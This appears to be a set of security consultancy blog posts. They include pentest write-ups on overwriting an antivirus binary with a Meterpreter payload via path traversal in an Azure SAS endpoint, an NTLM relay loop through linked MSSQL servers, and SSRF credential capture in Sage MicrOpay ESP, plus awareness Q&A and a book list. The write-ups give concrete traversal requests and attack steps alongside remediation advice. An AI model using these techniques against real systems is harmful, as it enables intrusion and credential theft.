Anti-malware malware

This blog post aims to share a tale from a recent pentest that I felt was too good to keep to myself.

Note: The names of the innocent have been changed to protect the guilty.

Background

The testing involved a web application that was designed to guide users through an application process that required documents to be submitted to the server via a file upload. The client for this pentest was understandably concerned about the security implications of handling untrusted user-supplied files, so they devised a system that would vet said files for malware prior to making them available for review.

The basic process for validating the files was as follows:

In terms of the architecture behind the system, a number of moving parts were introduced:

  • A cloud-based file storage container for hosting uploaded files
  • An API endpoint for generating shared access signatures (SAS) granting access to file uploads
  • A virtual machine responsible for performing antivirus checks and document manipulation of untrusted files
  • Polling functions that were executed once files were added to the cloud storage (to initiate the document sanitisation process)

Note: As a pentester, I had access to a lot of information about how the system worked behind the scenes. I had access to the source code, and the logging system, so I could validate when uploaded files were successfully or unsuccessfully processed.

SAS API Endpoint

Shared access signatures (SAS) are signed requests that provide access to Azure’s Blob Storage. Access can be either read or write, depending on the usage requirements. In this instance, the application exposed an API endpoint that would generate the write-only SAS on behalf of the user, similar to:

GET /GetSAS?upload=Myfile.png HTTP/1.1
Host: application.example.com

Which would return:

https://example.blob.core.windows.net/untrusted/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

The source code for this component resembled the following (NOTE: The actual code was C#/Dotnet, but I’ve used Python to demonstrate the logic):

def getSAS(filename):
    blobname = filename.split("/")[-1] # strip any path characters
    blobname = "untrusted/" + blobname
    sas = cloud.GetSAS(blobname, access="write")
    return sas

There are a couple of problems with this approach.

First, the user-supplied filename was preserved by the SAS-granting API endpoint. The application generated a UUID for each file using Javascript; however, as this process was performed client-side, the UUID could simply be overwritten with any filename. This meant that the efforts the application took to generate UUIDs for uploaded files were fruitless.

Second, the above sample code failed to adequately strip non-forward-slash filesystem metacharacters out of the supplied filename. Despite removing forward slashes (by way of truncating anything preceding the final forward slash in the filename), the application happily processed requests for filenames containing path characters such as ~, \, :, ., etc. This was a stroke of luck for the tester, as the SAS API would happily grant a valid SAS for paths containing such characters.

As a result, it was possible to perform a directory traversal attack and write to additional file containers outside of the designated untrusted/ directory. For example, an attacker could write into a super secret container by using path traversal and back slashes (such as ..\..\..\..\..\supersecret) within their request:

GET /GetSAS?upload=..\..\..\..\supersecret\Myfile.png HTTP/1.1
Host: application.example.com

Which would return https://example.blob.core.windows.net/supersecret/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Although read access was not granted to the SAS, write access was. This meant that the attacker could overwrite known files within containers inside (or outside) of the designated container.

Whilst neat, this was by no means interesting. We have to get a shell after all. And this river was running dry.

Time to regroup.

Cloud file storage and virtual directories

While testing the previously discussed directory traversal vulnerability, I noticed some curious behaviour. By requesting an SAS for a file within a defined directory tree (such as /this/is/Myfile.png), the file upload system would happily serve the file at that path. For example:

GET /GetSAS?upload=this\is\Myfile.png HTTP/1.1
Host: application.example.com

https://example.blob.core.windows.net/untrusted/this/is/Myfile.png?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

As it happened, the file storage container would create a virtual directory structure to match the filename of the uploaded file.

The storage container for this example would look like this:

untrusted/
└── this
    └── is
        └── Myfile.png

This was starting to get interesting.

The virtual machine

So, at this point I knew that uploaded files would get downloaded to a virtual machine and then scanned for viruses. The application logic involved with this task resembled the following: (NOTE: Again, the actual code was C#/Dotnet, but I’ve used Python to demonstrate the logic)

def trigger_scan(filename):
    file_contents = cloud.download_file(filename) # get the file from the blob store
    tmp_path = os.path.join(create_temp_path(), filename) # store this in a safe temp directory! (assume create_temp_path() returns "C:\Temp")
    with open(tmp_path, 'wb') as f:
       f.write(file_contents)
    x = subprocess.check_output(["C:\\Program Files (x86)\\AVProgram\\scanner.exe", tmp_path])
    # [...] Check that file was not malicious, then perform subsequent document transformation

So upon successful file upload, the function trigger_scan would execute automatically, performing the necessary operations to validate and then sanitise and transform the supplied file. At first I toyed around with trying to escape out of the process execution call to no avail.

What I could do; however, was control the filename that was concatenated using the Path.Combine function using the previously discussed path traversal attack. I toyed around with uploading various files for a while, and, after a bit of local testing with a minimal PoC, I determined that if the second argument to the Dotnet method Path.Combine was an absolute path, it ignored the first argument and returned the supplied absolute path.

According to the docs, this is intended behaviour:

“If one of the specified paths is a zero-length string, this method returns the other path. If path2 contains an absolute path, this method returns path2.” (Microsoft docs)

The following sample C# code demonstrates the vulnerability:

using System;
using System.IO;

namespace Program
{
    class Program
    {
        static void Main(string[] args)
        {
            string tmp = Path.GetTempPath();
            Console.WriteLine("Tmp path prefix is: {0}", tmp);

            string x = Path.Combine(tmp, "C:\\test\\a.exe");
            Console.WriteLine("Concatenated path is: {0}", x);
        }
    }
}

When executed:

C:\Users\Hacker>Hack.exe
Tmp path prefix is: C:\Users\Hacker\AppData\Local\Temp\
Concatenated path is: C:\test\a.exe

At this point I had a revelation: I control the absolute path that the file that I am uploading will be written to.

Further testing

Using the power of supplied logs (thanks client!) I could determine certain characteristics of my exploit attempts. I started to enumerate the logged messages, with a particular focus on the error messages.

I tested using a number of samples, including a benign control group (no logged error, application successfully processed the file), the EICAR test AV file (infection found! Oh no!). I then started writing benign files to locations on the system, such as C:\Windows\System32\a.png (Permission Denied!) and C:\test.png (no logged error, application successfully processed the file). At this point I knew I was onto something. If I could successfully write a file to C:\, then the user account performing the operation must have been highly privileged.

Putting it all together

So, to recap; at this stage I:

  • Was able to issue valid SAS for arbitrary locations on the filesystem
  • Could control where the file was written to disk
  • Had the location of a file that was guaranteed to be executed upon successful upload
  • Appeared to be able to write files as a privileged user

I hope you can see where this is going.

Payload

First thing’s first, I needed a payload. I was quietly confident that no competing AV would be in play here (since I knew the AV engine in use), so I went from zero to yolo and smashed out a meterpreter reverse_https payload using msfvenom.

Staging the payload

I then needed a valid SAS for my target payload. As discussed previously I could inject valid filesystem metacharacters into my filename, with the exception of /. I was not prepared to risk using space characters for the payload, so I opted to use another Windows trick; the short name. Long story short (pun totally intended), Windows short names are a means for providing mostly-unambiguous representations of path names greater than 15 characters. As usual it’s some relic from the past that is required for backwards compatibility. Don’t think about it. It’s probably better that way.

Anyway, my payload ended up looking like this:

GET /GetSAS?upload=.\C:\\PROGRA~1\\AVProgram\\scanner.exe HTTP/1.1
Host: application.example.com

Oh yeah that’s right. My goal here was the goods. I’m not just going to compromise this server. No; I’m going to replace the AV’s executable with my payload.

Anyway, the previous request returned the SAS:

https://example.blob.core.windows.net/untrusted/C:/PROGRA~1/AVProgram/scanner.exe?sv=2012-02-12&st=2009-02-09&se=2009-02-10&sr=c&sp=r&si=YWJjZGVmZw%3d%3d&sig=dD80ihBh5jfNpymO5Hg1IdiJIEvHcJpCMiCMnN%2fRnbI%3d

Upload… annnnndddd

I then uploaded the file to the SAS endpoint, and within seconds Metasploit had made a new friend 😀

Bonus points: The trigger_scan() function was running as the NT AUTHORITY\SYSTEM user!

Bonus Bonus points: The AV program is toast at this point; I’ve replaced the binary with a malicious .exe. This has the interesting side-effect of ensuring that anytime a legitimate user uses the application as intended; I get a shell.

Bonus Bonus Bonus points: The application now outright fails to complete its primary purpose of scanning untrusted files for viruses.

Recommendations

Honestly, I am kind of astounded that any of this actually worked. Fortunately, there are numerous ways that the exploit in question could have been trivially stopped dead in its tracks.

  • Flatten filenames to a GUID <- this would have done it
    • Have the SAS endpoint generate a filename for the destination file using a GUID, rather than accepting the user-supplied one
  • Copy the file to the filesystem sans-extension
    • Extension was unnecessary in this context, given the operations required (i.e. AV scanning)
  • Don’t run services as SYSTEM/privileged users…
    • In this instance, given that the AV was executing on demand against a file, administrator privileges were unnecessary
  • Restrict storage container access for the SAS
    • Also don’t let it create virtual directories
  • (Less recommended) If you are going to accept the untrusted filename; sanitise ALL file path metacharacters
    • Probably don’t do this though. Seriously.

There’s just something deeply philosophical (and satisfying) about defeating an anti-malware system by overwriting the anti-malware program with malware.

The top five questions asked at security education and awareness presentations

Online security can be frustrating and confusing for end users, leading to a greater number of successful cyber-attacks. Attackers are increasing their sophistication in line with advancements in online technology and things go wrong when the end user is confused – attackers prey on this confusion and supplement it with fear. Many issues relating to cyber security can be avoided by demystifying some of the threats, methods, motives, and by providing simple advice for online safety. That’s where security education and awareness presentations come in.

The team at Asterisk deliver many education and awareness presentations to clients covering information security policy and demystifying online threats. These presentations also educate users on security controls (both technical and non-technical) that they can apply easily at home and in the office.

From C-level executives to IT Managers, support desk, workshop and administrative staff, everyone has a question to ask. Here are the top five questions we are regularly asked at security education and awareness presentations:

Q: “How do I make my passwords secure?”

A: We recommend using passphrases instead of passwords. A passphrase is a group of words together such as “Sunny Commodore Apple Polyester” that is easy for you to memorise but hard for attackers to crack. The trick is to make sure the words are random, anything that would be obvious to people you know or who follow your public social media accounts, such as your favourite sports, animals, or TV shows should be avoided.

Where you can, we also recommend turning on multi-factor authentication, so your account will perform a second check (or factor) before letting you in. The most common second factor used for personal services is to send an SMS to your mobile phone. This means that even if your password is guessed or cracked, the attacker won’t be able to get into your account without the second factor – your phone.

If you would like to read more about passwords we recommend the NIST guidance which is available here.

Q: “Are password managers safe to store all my passwords?”

A: Generally yes, password managers are a safe place to store your passwords, as long as you choose a good one! There are a number of free and subscription-based password managers on the market so we recommend reading reviews before deciding which one to use. Some products allow you to sync your passwords across all your devices so you can have access on your desktop, laptop or phone, and others will include a secure password generator that will create strong passwords for you. Remember, your password manager is only as secure as your master password. We suggest you always enable two factor authentication and use a strong passphrase rather than a password to access your password manager.

Q: “Are banking apps on my phone safe to use?”

A: Yes, if they are installed from the genuine app store (Apple App Store, Android Marketplace, Google Play Store, etc) and the bank is a major player in the Australian market. Always use trusted apps and never install an app from a website or email link. The bank should be listed as the app publisher or seller. If you have any suspicions about the authenticity of a mobile banking app, contact your bank for verification.

Also, remember not to store any of your banking passwords or other information that could be used to access your bank accounts on your device.

Q: “Is it safe to use Public or “Free-Wifi” when available?”

A: Connecting to public free Wi-Fi use comes with several risks. Public WiFi networks are generally not encrypted, which means anyone nearby with some basic monitoring tools can see the information passing between your device and the access point you are connected to. In our opinion, the safest option is to not use these networks at all, but if you do find yourself needing to connect to a public wi-fi network, consider using a trusted virtual private network (VPN) to encrypt the information that is moving across your connection and never log in to online banking sites or websites that store your credit card information.

It’s also good practice to turn off Wi-Fi or Bluetooth connections when not in use, which is also great for your battery life!

Q: “Can I use the same strong password on many sites?”

A: Reusing the same password across different accounts is never a good idea. If one site is breached or someone gets hold of that password, they can use it to access multiple accounts. You should always use unique passwords for your work and personal accounts and be extra careful with sensitive accounts like online banking or accounts with a lot of personal information like MyGov. If you think your password may have been compromised or you notice anything suspicious, change your password immediately and report it where appropriate. Password managers can assist with keeping track of different passwords and generating strong passwords that are less likely to be guessed or cracked.

 

Security education and awareness presentations are not just “one size fits all”. Surveys are conducted to identify gaps in staff knowledge, then training content is tailored to cover those gaps and fit the culture of the business. By undertaking training, staff can learn how to work safely online and create a culture of security – both at work and at home.

For more information about on how a security education and awareness presentation can benefit your organisation, contact the team at Asterisk on 1800 651 420 or contact@asteriskinfosec.com.au

 

NTLM Relay Backflips

A little while back we were conducting an application security test for a client, when we managed a fun little backflip with NTLM credential relaying that we felt was worth sharing.

The application was at first glance quite unremarkable. A fairly typical Windows thick client, an application server, and a back-end MSSQL database server. As it usually does, the fun started with one of those ‘huh, that’s interesting’ moments. Looking at some XML configuration files in the thick client’s directory we found a handful of base64 encoded values with names like ‘DBUsername’ and ‘DBPassword’, next to some plain-text host names and port numbers. Attempting to decode the base64 resulted in illegible binary garbage, so they were obviously encrypted. It seems likely that the application developers assumed that an attacker would give up at this point, but we are nothing if not stubborn, and our thinking was that if the client software was able to decrypt these credentials, and we had a copy of the client, we MUST be able to decrypt them as well.

Initially we braced ourselves for a tedious reverse-engineering process, but were quickly relieved to find that the relevant binaries were all managed .NET, meaning we were able to simply decompile them back to extremely legible source code. Grepping the source for the string ‘crypt’ very quickly identified the function responsible for the encryption and decryption of our stored database credentials, along with a hard coded key and IV, both of which were based very closely on the name of the software vendor.

After some short work in python reimplementing the decryption function from the application, we were the proud owners of some shiny new database credentials, but what could we do with them? Logging into the MS SQL Server instance we found that even though this WAS the same server used by the application for its main database, the credentials we had were only able to access a smaller, less interesting database on the same server. The client retrieved its most sensitive data using a more traditional approach, i.e. via an application layer server with its own back-end connection to the database.

‘xp_cmdshell’, that eternal hacker favourite, was not available to our user. If we wanted to find a way to pop the database server itself we were going to need to get at least a little bit creative.

Next we tried another classic trick using a different extended stored procedure, ‘xp_dirtree’. xp_dirtree essentially asks the SQL Service instance to provide a directory listing of a given file path. By providing a UNC path directing the server to an attacker-controlled host, one can usually use tools like Responder or ntlmrelayx to capture a NetNTLMv2 hash of the SQL Server service account password, or relay the service account’s credentials and use them to authenticate via SMB to a secondary host. While we were able to capture a hash, the password configured was strong enough to resist our efforts at cracking in the time we had available. Further, we were unable to relay the credential via SMB to any of the in-scope hosts, as all had been configured with SMB signing set to the dreaded ‘REQUIRED’, making our relayed credentials worthless.

Foiled.

But wait! NTLM authentication can be relayed to authenticate for many other protocols, including HTTP and MSSQL! Maybe the usual rules against reflecting NTLM authentication back to the source host wouldn’t apply in a cross-protocol scenario like this? Nope, they still apply.

Foiled again.

At this point we became a little frustrated and went back to basics, digging a little deeper in some earlier reconnaissance data we had acquired, including some gathered using Scott Sutherland’s (@_nullbindon Twitter) amazingly useful PowerUpSQL PowerShell module. PowerUpSQL will enumerate (among many other things) the links between one database server and another. These links are especially common in scenarios where you have a primary ‘operational’ database server and a secondary server which acts as a ‘data warehouse’, with data regularly being groomed from one database and archived in the other, which is exactly the scenario that it identified for us in this case.

Sending queries via the first database to the data warehouse did not immediately yield any particularly useful results. We were similarly low-privileged in the data warehouse, and it was beginning to look like something of a dead end, when we suddenly realised that we already had everything we needed to own the whole box and dice.

First we set up ntlmrelayx to catch SMB authentication attempts against our attacker-controlled host and relay them on to the same MS SQL Server port as before, only this time instead of running xp_dirtree on the first server, we used the database link to send the same xp_dirtree query to the second server. It attempted to connect to our host, which negotiated NTLM authentication and then relayed the authentication attempt back around to the first server’s MS SQL Server port, essentially completing a full loop.

We were back where we started, but now we were authenticated as the SQL Server service account, which had local Administrator privileges on both SQL servers, and thus was granted full ‘sa’ privileges on them as well. With admin access in hand we were able to enable the ‘xp_cmdshell’ extended stored procedure and use it to execute shell commands in the underlying OS as a full admin user. We won’t go into full detail here but after this breakthrough it was a matter of mere minutes before we were able to gain full control of the entire AD/Windows environment.

So, what are the take-home lessons from all of this?

Don’t hard-code credentials and encryption keys into your application configs or binaries. If your security design relies on doing this, you’ve designed it wrong.

Don’t let users log directly into the database server – make them go via an application layer server.

Disable SQL Server extended procedures that aren’t needed, including xp_cmdshell, xp_dirtree, and xp_filexist.

Outbound firewall rules matter almost as much as inbound. If your backend servers don’t need to speak SMB to the client, don’t let them!

… and while SMB signing is an extremely underrated and effective security control, no single security control is ever completely effective in the face of a determined adversary.

Our favourite infosec books

We have a clever bunch working here at Asterisk. From directors to testers, consultants, and business development managers, everyone is passionate about information security. There may be regular debates over music, coffee vs tea, and the best place for lunch in the city, but we’re all on the same page when it comes to information security.

To share our love of all things infosec, we surveyed some of the team on their favourite books. These 11 titles have educated, enlightened and entertained and come highly recommended for anyone interested in information security…

 

I loved ‘The Cuckoo’s Egg’ by Cliff Stoll. In the 80’s Stoll was an admin for a university shared computing system and investigating a minor accounting discrepancy led to him basically uncovering a spy ring working for the Russians. True story.

Mike Loss, Senior Security Consultant

 

‘Future Crimes’ by Marc Goodman is the book that sparked my initial interest in infosec and gave me the urge to explore a career in the industry. I picked it up at an airport book store (I actually thought it was a true crime book – didn’t realise it had anything to do with infosec) but was hooked from the first few pages. It made me realise that just about everything is connected, and as a result just about everyone is vulnerable. I made a decision there and then to try and learn more/get involved in the industry. Also, I encourage anyone who assumes that information security is purely about technology to give ‘Social Engineering: The Art of Human Hacking’ by Christopher Hadnagy a read. It uses a lot of a real world examples and made me question why we so often focus on information security strategies that tend to address technology and product as opposed to people and process.

Sam Moody, Business Development Manager

 

‘Firewalls and Internet Security: Repelling The Wily Hacker’ by William R. Cheswick and Steven M. Bellovin was the book that started it all. First published in 1994, it was one of the earliest (and definitely one of the greatest) books on network security. ‘The Web Application Hacker’s Handbook’ by Marcus Pinto and Dafydd Stuttard was (is) the bible for web application security testing. It’s a little dated now (published in 2011), but still very relevant and full of some great knowledge. Another favourite is ‘The Browser Hacker’s Handbook’ by Christian Frichot, Wade Alcorn and Michele Orru – because Christian is a hipster God, and we all miss him very much.

David Taylor, Principal Security Consultant

 

I read ‘The Cathedral and the Bazaar’ by Eric S. Raymond almost 20 years ago and it was an insight into the world of monopolies and how to succeed without selling code – how Netscape survived, and the differences between top-down and bottom-up approaches to development.

Daniel Marsh, Security Consultant

 

I usually get bored of “career advice” books pretty quick but I picked up ‘Women in Tech’ by Tarah Wheeler after following Tarah and some of the other contributors on Twitter. The advice in the book is stellar, but what I loved most were the personal stories from successful women in tech like Brianna Wu and Keren Elazari woven through.

Cairo Malet, Security Consultant

 

‘Gray Hat Python: Python Programming for Hackers and Reverse Engineers’ by Justin Seitz is a good way to learn both scripting/programming and practical offensive security. Some of the content is a little dated, and for the most part better tools exist to do the tasks that are covered. However, the step-by-step approach provides a great foundation for some common offensive security tools and processes.

Clinton Carpene, Security Consultant

 

The novel ‘Neuromancer’ by William Gibson tells the story of a washed-up computer hacker hired by a mysterious employer to pull off the ultimate hack. The Matrix, cyberpunk, implants – Gibson’s dystopian future is a classic. Another novel, ‘Snow Crash’ by Neal Stephenson, presents the Sumerian language as the firmware programming language for the brainstem, which is supposedly functioning as the BIOS for the human brain. Stephenson is next level Gibson and features the Matrix (Metaverse) and cyberpunk references. Stephenson can get heavy, and satiric, but again it’s a classic for the genre.

Steve Schupp, Managing Director

 

What’s your favourite infosec book?

 

Book covers image source – Booktopia

 

Server-side request forgery in Sage MicrOpay ESP

Asterisk Senior Security Consultant Mike Loss shares a story from a testing engagement that was fun for us, moderately bad news for our client and ultimately worse news for a vendor. Spoiler alert – this story has a happy ending.

During a testing engagement last year I was working on a web app called “Sage MicrOpay ESP”. ESP stands for Employee Self-service Portal, and it’s a pretty standard HR web app, allowing employees to enter timesheets, book leave, etc.

Looking at the first handful of requests made by the browser when loading the page, one stood out immediately as… odd.

https://esp.REDACTED.com.au/ESP/iwContentGen.dll/start?InitialPage=100&NOLOGIN=Y&PageReadOnly=N&MAE=N&HAE=N&CommonDatabase=53227%20EvolutionCommon&CommonServer=REDACTED-SQL02&US=03dbbb66-cf9b-46de-97cb-cfa450de93bf

There are a few file extensions that really set the spidey-sense tingling when it comes to web apps. The list is long, but classics include pl, sh, exe, and in this instance, .dll.

Image Source

Looking through the URL parameters in the request, something else stood out – the ‘CommonDatabase’ and ‘CommonServer’ parameters. It seemed pretty odd that the user would be in control of a web app’s database connection. At first I doubted that was what was actually happening but once I noticed that the value in ‘CommonServer’ matched the naming convention of the target organisation’s server fleet, I became more confident that I was on to something.

Put simply, it turns out that one of ESP’s very first actions upon loading was to tell the client’s browser: ‘Hey I need you to tell me to connect to a database server. You should tell me to connect to this one!’.

There’s essentially no reason for a web application of this type to ever ‘ask’ a regular client which database on which server the application should connect to. In any sane application this value would be in a configuration file, somewhere inaccessible to normal users of the application.

So of course I did what any normal tester would do, I threw a bunch of garbage at the interesting parameters to see what would stick.

Most things I tried at first resulted in the request timing out, but we maintain a pet DNS server for just such an occasion. Keeping an eye on the query logs for the server and sending the request again with our DNS name in the ‘CommonServer’ parameter resulted in a lovely sight.

At the very least we have some kind of server-side request forgery in play. The obvious next step for us was to see what else we can get the server to talk to. Internal hosts? Hosts out on the Internet?

The thing clearly wants to talk to a database server… let’s give it a database server. The .dll file extension tells us it’s on Windows, so MSSQL is an obvious place to start.

Starting up a netcat listener on port 1433 on a host in AWS and then sending our DNS name in the ‘CommonServer’ field generated exactly the result we’d hoped for.

So we have a web application on the inside… and it thinks I’m it’s database server…

Image Source

I wonder if I can get it to send me credentials?

The obvious tool for the job here is Responder. It’ll happily impersonate a server, then negotiate and accept more or less any authentication request that a client is willing to send it, then serve up the resulting credentials on a platter.

After repeating the process with Responder in place of our netcat listener, we get some creds!

Fun for us, but moderately bad news for our client.

At this stage I was moderately disappointed by the quality of the very obviously default creds, especially since they were no good to me in terms of further attacks on the target infrastructure.

I started goofing around with the format of the server address, trying out UNC addresses, internal addresses, specifying ports, that kind of thing, and eventually hit on formatting it like this:

…which made my Responder go off like crazy.

Image Source

For those not familiar with NTLM authentication, it APPEARS that the application has interpreted our gently mangled server name as a UNC path, in such a way that it thinks it needs to get to the database via SMB.

As a result, it’s connected to my Responder listener on port 445, and Responder has told it to authenticate via NTLM. The application has kindly obliged and we end up with a NetNTLMv2 hash – that long string of yellow alphanumerics at the end of the image.

Now, a NetNTLMv2 hash is quite a lot slower to crack than a regular NTLM hash if you want to actually recover the password, but if you notice that ‘$’ at the end of where I’ve redacted the username? That means the account being used to authenticate is the AD account of the actual server itself. That means the password is randomly generated and LOOOONG.

Never going to crack it. Just not gonna happen.

What we COULD do however is relay the authentication attempt… IF the target organisation had any services facing the internet that used NTLM authentication AND allowed connections from computer accounts. This might seem unlikely at first, but ‘Authenticated Users’ includes computer accounts, and heaps of sysadmins grant rights to ‘Authenticated Users’ where they should really use ‘Domain Users’. In any case, our target organisation didn’t have anything else with NTLM auth facing the Internet so it’s at this point that the attack becomes kind of academic.

In addition to this particularly entertaining issue, we also identified a number of other issues with the application, including unauthenticated access to staff names, phone numbers, addresses, and other sensitive PII.

After delivering the report to our client we began the least fun part – the disclosure to the vendor.

It turns out that ‘Sage’ is a pretty big company, and finding anyone responsible for infosec matters was non-trivial.

I started with the support email on the website. While the staff at the other end responded very quickly, there seemed to be a breakdown in communications.

Sage support continued to insist that I needed to provide a customer number before they would provide me with any support services. I tried explaining that I wasn’t asking for support services…

And then they stopped replying to my emails. 🙁

So I tried the traditional “security@” email address… Not a peep.

I asked around with some industry contacts… Nobody knew anybody who worked at Sage.

Finally I resorted to what I think of as ‘the Tavis’.

Turns out Tavis is a smart guy (who knew, right?) because this worked… real fast.

Without boring you to death with details, I almost immediately received a phone call from an actual dev, who was actually familiar with the app, and who actually wanted to fix the problem!

I passed through the details, they fixed the issues, and a patch came out about a month later.

Finally, because we’re meant to be trying to actually make things better when we hack stuff, I’d like to go over a quick summary of the ways this could have been prevented.

On the dev side, the most obvious part is that the client should not have ever been given the opportunity to choose the back-end database server. It should have been set in a config file somewhere.

Of course, we can’t expect vendors and developers to always do the right thing. Strict outbound network filtering would’ve prevented both the MSSQL and NTLM credential exposures. Your computers almost certainly do not need to talk to things on the public Internet on tcp/445 and tcp/1433, so don’t let them!

Sage were very helpful and friendly (and appreciative) once I actually made contact with the right group within the company, but getting there was unnecessarily difficult. Monitor your security@ address and publish a contact on your website for vulnerability disclosure.